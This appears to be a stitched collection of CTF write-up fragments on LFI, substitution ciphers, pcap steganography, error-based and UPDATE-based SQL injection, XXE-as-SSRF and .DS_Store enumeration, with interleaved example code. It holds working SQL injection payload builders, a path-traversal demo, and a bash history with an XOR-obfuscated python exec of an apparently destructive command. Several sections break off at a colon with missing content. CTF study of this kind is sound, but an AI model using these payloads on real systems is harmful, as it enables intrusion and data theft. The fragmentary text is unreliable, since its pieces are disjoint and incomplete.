We are presented with a web application that lets us register an account, log in and be surprised with random disturbing videos xDDD. The application uses a page parameter to reference and include other pages, and it is vulnerable to LFI. For example, instead of going to http://magic.polictf.it/magic_things.php we can include it from index.php with http://magic.polictf.it/index.php?page=magic_things. So it seems that we can include any file ending in .php, since we cannot discard the appended extension with a null byte (the server appends .php to whatever we send, and the usual null-byte truncation does not work here).
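To make the constraint concrete, here is an added Python model of the PHP pattern include($_GET['page'] . '.php'). This is example code, not the challenge's source: the directory layout, file names and the allowlist are constructed for the demo. It shows that the forced suffix only limits which files can be included (anything ending in .php, anywhere on disk via ../), that the null-byte trick is rejected outright by a modern runtime, and what an allowlist-based include looks like.

```python
import os
import tempfile

# Added example (not the challenge's own code): a Python model of the PHP pattern
# include($_GET['page'] . '.php'). Directories, files and names are constructed here.

def include_page_vulnerable(webroot, page):
    """No validation: the user-supplied name gets '.php' appended and is read
    relative to the web root, so any .php file on the box is reachable via '../'."""
    path = os.path.join(webroot, page + ".php")
    with open(path) as f:
        return f.read()

# Hardened variant: the parameter selects one of a fixed set of known pages.
ALLOWED_PAGES = {"index", "magic_things"}

def include_page_safe(webroot, page):
    if page not in ALLOWED_PAGES:
        raise ValueError("unknown page: %r" % page)
    with open(os.path.join(webroot, page + ".php")) as f:
        return f.read()

def _write(path, text):
    with open(path, "w") as f:
        f.write(text)

def demo():
    """Lay out a constructed tree and issue the requests discussed above."""
    root = tempfile.mkdtemp()
    public, private, etc = (os.path.join(root, d) for d in ("public", "private", "etc"))
    for d in (public, private, etc):
        os.makedirs(d)
    _write(os.path.join(public, "magic_things.php"), "<?php /* videos */ ?>")
    _write(os.path.join(private, "secret.php"), "<?php $flag = 'constructed'; ?>")
    _write(os.path.join(etc, "passwd"), "root:x:0:0:root:/root:/bin/sh\n")

    results = {
        "normal": include_page_vulnerable(public, "magic_things"),
        # Traversal works: the suffix restricts the extension, not the location.
        "traversal": include_page_vulnerable(public, "../private/secret"),
    }
    try:
        # Classic null-byte trick to drop the suffix; rejected by modern runtimes.
        include_page_vulnerable(public, "../etc/passwd\x00")
        results["nullbyte"] = "included"
    except (ValueError, FileNotFoundError):
        results["nullbyte"] = "blocked"
    try:
        include_page_safe(public, "../private/secret")
        results["hardened"] = "included"
    except ValueError:
        results["hardened"] = "blocked"
    return results

if __name__ == "__main__":
    print(demo())
```

The takeaway for the challenge is the "traversal" result: with the extension forced, the search is for an interesting .php file that is already on the box, not for /etc/passwd.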
We are presented with an online shop selling Referee t-shirts. They have ids from 1 to 8 and then 10 (9 is skipped). There is also a search form that seems to escape some characters. The search submission is somewhat odd: our search is submitted to the server, which returns a hash that we submit back to get the actual results. So either the hash is an encrypted version of our search query that is decrypted and executed on the server, or it is a hash that identifies the query and is mapped back to it in the server session.
Holidays are here! But John still hasn't decided where to spend them, and time is running out: flights are overbooked and prices are rising every second. Fortunately, John has just discovered a website where he can book last-second flights to all the European capitals; however, there is no time to waste, so he just grabs his suitcase and, thanks to his new smartphone, looks up the city of his choice while rushing to the airport.
We are given a text that looks like base64, so we decode it and find a gzip file containing a text file with 296 phrases from the Bible. These phrases are repeated, so we assigned a random character to each distinct line and got something like:

    abccde fagh iajccbklb gh mbno bjho ghkpf gfq gpr fnogkl fd sngfb j cdkl rbhhjlb hd hfjfghfgih sgcc abct odu sgfa fab cbffbn vnbwubkigbhx yuf gpr kdf nbjcco lddz jf fajfx d0 fajfph bkdulae jajae gpr gk cdmb sgfa hgrtcb cdsbnijhb vcjlh sgfaduf htjibh jkz hfnjklb horydchx vcjl1cyafyllumvhokfyywsyd2

Using a substitution cipher solver and a little bit of manual correction we get:
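The pipeline described above (base64, gunzip, one symbol per distinct line, frequency-based first guess, manual corrections), as an added Python example that is not the author's solver. It assumes a blank line marks a word break, which the page does not state, and it builds its own small fixture in the challenge's layout instead of using the real 296-line file.

```python
import base64
import gzip
from collections import Counter

# Added example, not the challenge's own solver. The file is modelled as the page
# describes it: one phrase per line, the same phrase wherever the same plaintext
# character occurs. How spaces were encoded is not stated; a blank line is assumed.

SYMBOLS = "abcdefghijklmnopqrstuvwxyz0123456789"
ENGLISH_ORDER = "etaoinshrdlcumwfgypbvkjxqz"  # rough frequency order, for a first guess

def unpack(b64_text):
    """base64 text -> gunzip -> list of lines (the challenge's packaging)."""
    return gzip.decompress(base64.b64decode(b64_text)).decode().splitlines()

def symbolize(lines):
    """Give each distinct line one symbol, in order of first appearance.
    Returns (ciphertext, {line: symbol})."""
    table, out = {}, []
    for line in lines:
        if not line.strip():
            out.append(" ")          # assumed word separator
            continue
        if line not in table:
            table[line] = SYMBOLS[len(table)]
        out.append(table[line])
    return "".join(out), table

def frequency_guess(ciphertext):
    """Pair symbols with English letters by frequency rank; only a starting point."""
    counts = Counter(c for c in ciphertext if c != " ")
    return {sym: letter for (sym, _), letter in zip(counts.most_common(), ENGLISH_ORDER)}

def apply_key(ciphertext, key):
    """Decrypt with a possibly partial key; unknown symbols are shown as '?'."""
    return "".join(c if c == " " else key.get(c, "?") for c in ciphertext)

def solve(b64_text, corrections=None):
    """Full pipeline: unpack, symbolize, guess by frequency, apply manual corrections."""
    ciphertext, _ = symbolize(unpack(b64_text))
    key = frequency_guess(ciphertext)
    key.update(corrections or {})
    return apply_key(ciphertext, key)

def build_sample(message):
    """Constructed fixture: encode MESSAGE the way the challenge file is laid out
    (one line per character, identical lines for identical characters)."""
    phrase_for = {ch: "verse %02d" % (ord(ch) - ord("a")) for ch in set(message) if ch != " "}
    lines = ["" if ch == " " else phrase_for[ch] for ch in message]
    return base64.b64encode(gzip.compress("\n".join(lines).encode())).decode()

if __name__ == "__main__":
    sample = build_sample("the flag is hidden in plain sight")
    cipher, table = symbolize(unpack(sample))
    print(cipher)
    print(apply_key(cipher, frequency_guess(cipher)))
```

On a message this short the frequency guess is mostly wrong; that is exactly why the manual-correction step exists. With the challenge's longer text the common symbols land on e, t, a and short words like "the" and "is" give the rest away.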
We are given a pcap with the traffic generated against an old version of http://polictf.it. We can use NetworkMiner or a similar tool to extract all files and compare them with the originals. logo.png differs from the original, and with StegSolve we can find the secret flag:
We are welcomed by a login page where we can register a new account and log in with it. After logging in to the application we are greeted with: Hello pwntester. Try to login as 0ops! The first thing I looked for was SQL injection in the register and login forms. The register form turned out to be injectable, and we can use the Duplicate entry technique (error-based extraction: a GROUP BY on a key built from floor(rand(0)*2) and the value we want makes MySQL fail with a duplicate key error that contains that value) to dump the DB: Get the DB:
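For reference, an added Python example (not the challenge's exploit) of the Duplicate entry technique: the payload shape for a quoted string context, a small model of why MySQL's GROUP BY on a non-deterministic key raises the error, and the regex that pulls the leaked value back out. The rand(0) bit sequence is the commonly documented one and is an assumption here; the subquery and prefix are placeholders.

```python
import re

# Added example, not the challenge's own exploit. Shows the payload shape and why
# MySQL leaks the subquery's value in a "Duplicate entry" error.

# floor(rand(0)*2) is seeded, so it yields the same bits on every run. The first
# values are commonly documented as 0,1,1,0,1,1,0,0,1,1 (assumed here).
RAND0_BITS = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1]

def payload(subquery, prefix="x"):
    """Injection for a quoted string context (e.g. the username field of an INSERT).
    The inner SELECT needs at least three rows, hence information_schema.tables."""
    return ("%s' or (select 1 from (select count(*),concat((%s),floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)-- -" % (prefix, subquery))

def simulate_group_by(rows, value, bits=RAND0_BITS):
    """Model of MySQL grouping on a non-deterministic key: the key is evaluated once
    to look the group up and again when a new group is inserted. Returns the error
    text MySQL would raise, or None if the query succeeds."""
    groups = {}
    bit = iter(bits)
    for _ in range(rows):
        key = "%s%d" % (value, next(bit))
        if key in groups:
            groups[key] += 1
            continue
        key = "%s%d" % (value, next(bit))     # re-evaluated on insert
        if key in groups:
            return "Duplicate entry '%s' for key 'group_key'" % key
        groups[key] = 1
    return None

LEAK = re.compile(r"Duplicate entry '(.*)[01]' for key 'group_key'")

def extract(error_text):
    """Strip the trailing rand() bit from the duplicated key to get the leaked value."""
    m = LEAK.search(error_text)
    return m.group(1) if m else None

if __name__ == "__main__":
    print(payload("select version()"))
    err = simulate_group_by(rows=3, value="5.5.41")
    print(err, "->", extract(err))
```

The model reproduces the known behaviour that the error needs at least three rows in the grouped table: with the bits 0,1,1,0,1 the first row is inserted as value1, the second row hits it, and the third row is looked up as value0, re-evaluated as value1 on insert, and collides.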
While playing Golden Mac 1 I found the .bash_history for user salt, which looked like:

    whoami
    pwd
    ls
    sudo nmap -sS 220.127.116.11/24 -p 22,80,3306
    curl http://18.104.22.168/secret_blog/?id=1
    msfconsole
    curl https://twitter.com/_SaxX_/status/580376290525650944
    python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"
    shit!
    exit

While the SaxX tweet was funny, the secret_blog looked promising. The IP was not accessible from the outside, but we could leverage our XXE injection as an SSRF and visit the blog.
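The one-liner in the history exec's an XOR-obfuscated string straight away, which is a bad habit when the string came from someone else. The added Python example below (not the challenge's code) decodes it without executing anything and also recovers the single-byte key by scoring each candidate, for the case where the key is not sitting next to the blob. The scoring heuristic is an assumption, not something the page describes.

```python
# Added example, not the challenge's own code: decode the XOR'd one-liner from the
# history without exec'ing it, and recover the key when it is not given.

HISTORY_BLOB = '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'   # verbatim from the .bash_history above

def xor_decode(data, key):
    """Byte-wise XOR with a single-byte key, returned as text."""
    return "".join(chr(ord(c) ^ key) for c in data)

def score(text):
    """Crude scoring for English/script text: reward lowercase letters and spaces,
    punish bytes outside printable ASCII. Assumed heuristic, good enough for short blobs."""
    s = 0
    for c in text:
        o = ord(c)
        if o < 0x20 or o > 0x7e:
            s -= 5
        elif c == " " or "a" <= c <= "z":
            s += 1
    return s

def recover_key(data):
    """Try every single-byte key and return the best scoring one."""
    return max(range(256), key=lambda k: score(xor_decode(data, k)))

if __name__ == "__main__":
    k = recover_key(HISTORY_BLOB)
    print("key: 0x%02x" % k)
    print("decoded:", xor_decode(HISTORY_BLOB, k))
```

Decoding first explains the "shit!" that follows in the history: the line salt pasted was a destructive command, not a helper.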
We are given thousands of 3D coordinates in a text file (three comma-separated x,y,z points per line, separated by semicolons):

    -4.751373,-2.622809,2.428588;-4.435134,-3.046589,2.406030;-4.788052,-2.661979,2.464709
    -4.692748,-2.599611,2.629112;-4.656070,-2.560445,2.592991;-4.788052,-2.661979,2.464709
    -4.692748,-2.599611,2.629112;-4.788052,-2.661979,2.464709;-4.435134,-3.046589,2.406030
    -4.656070,-2.560445,2.592991;-4.516017,-2.714652,2.570303;-4.751373,-2.622809,2.428588
    -4.656070,-2.560445,2.592991;-4.751373,-2.622809,2.428588;-4.788052,-2.661979,2.464709
    -4.611258,-2.777269,2.405960;-4.435134,-3.046589,2.406030;-4.751373,-2.622809,2.428588
    -4.572725,-2.644557,2.333280;-4.603014,-2.680354,2.364417;-4.592222,-2.663824,2.351891
    -4.571442,-2.773632,2.381504;-4.564917,-2.826000,2.397583;-4.611258,-2.777269,2.405960
    -4.571436,-2.742115,2.369542;-4.571442,-2.773632,2.381504;-4.611258,-2.777269,2.405960
    -4.571436,-2.742115,2.369542;-4.611258,-2.777269,2.405960;-4.567214,-2.723559,2.360054
    -4.567214,-2.723559,2.360054;-4.611258,-2.777269,2.405960;-4.560604,-2.711404,2.351613
    -4.564917,-2.826000,2.397583;-4.435134,-3.046589,2.406030;-4.611258,-2.777269,2.405960
    -4.560604,-2.711404,2.351613;-4.611258,-2.777269,2.405960;-4.614635,-2.748184,2.396883
    ...
    ...

If we represent them with matplotlib using something like:

    from matplotlib import pyplot
    from mpl_toolkits.mplot3d import Axes3D  # registers the '3d' projection

    x_vals, y_vals, z_vals = [], [], []
    # every line holds three "x,y,z" points separated by ';'
    for line in open("x-y-z", "r"):
        for point in line.strip().split(";"):
            if not point:
                continue
            x, y, z = (float(v) for v in point.split(","))
            x_vals.append(x)
            y_vals.append(y)
            z_vals.append(z)

    fig = pyplot.figure()
    ax = fig.add_subplot(111, projection="3d")
    ax.scatter(x_vals, y_vals, z_vals, s=1)
    pyplot.show()
In the description and task title, it states that the developer uses a MacBook Pro. So we looked for a .DS_Store in the application root directory and found one, whose contents we can read with this simple Python script (using the ds_store module):

    from ds_store import DSStore

    # .DS_Store records every entry Finder saw in the directory,
    # including files the web application never links to
    with DSStore.open("DS_Store", "r+") as d:
        for entry in d:
            print(entry)

Output:

    <index.php Iloc>
    <parse.class.php Iloc>
    <u_can_not_guess_this_haha.php Iloc>

It seems the flag is in u_can_not_guess_this_haha.php.
A simple web application where we can register and log in. Once logged in, we can change our password. The home page shows a message from A Tale of Two Cities and the email we used to log in. There is a SQL injection affecting the UPDATE statement sent by the Modify password feature. The idea is to modify the statement so that it also changes the email (which we can read on the home page), turning the write-only injection into a way to read data:
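An added Python example of that idea, using sqlite3 so it runs offline; it is not the challenge's code, and the table and column names (users, secrets, email, password) are assumptions. It shows the vulnerable UPDATE beside the parameterised version and the payload that smuggles a second SET item into the statement.

```python
import sqlite3

# Added example, not the challenge's own code. Table and column names are assumptions;
# the point is how the UPDATE is built and what the injected SET clause does.

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, password TEXT)")
    con.executemany("INSERT INTO users (email, password) VALUES (?, ?)",
                    [("attacker@example.com", "oldpass"), ("victim@example.com", "s3cret")])
    con.execute("CREATE TABLE secrets (flag TEXT)")
    con.execute("INSERT INTO secrets VALUES ('flag{constructed_example}')")
    return con

def change_password_vulnerable(con, user_id, new_password):
    """The challenge's pattern: the new password is concatenated into the UPDATE."""
    sql = "UPDATE users SET password='%s' WHERE id=%d" % (new_password, user_id)
    con.execute(sql)

def change_password_safe(con, user_id, new_password):
    """Bound parameters: the value can never become part of the SET list."""
    con.execute("UPDATE users SET password=? WHERE id=?", (new_password, user_id))

def home_page_email(con, user_id):
    """What the home page shows: the e-mail stored for the logged-in user."""
    return con.execute("SELECT email FROM users WHERE id=?", (user_id,)).fetchone()[0]

# Closes the password literal, adds a second SET item that copies the data we want
# into our own e-mail column, and comments out the rest of the original statement.
# The resulting statement is:
#   UPDATE users SET password='pwned', email=(SELECT flag FROM secrets) WHERE id=1-- ' WHERE id=1
PAYLOAD = "pwned', email=(SELECT flag FROM secrets) WHERE id=1-- "

if __name__ == "__main__":
    con = make_db()
    change_password_vulnerable(con, 1, PAYLOAD)
    print("home page now shows:", home_page_email(con, 1))
```

The WHERE id=1 inside the payload matters: without it the injected UPDATE rewrites every user's email, which is both noisy and, in a real engagement, destructive.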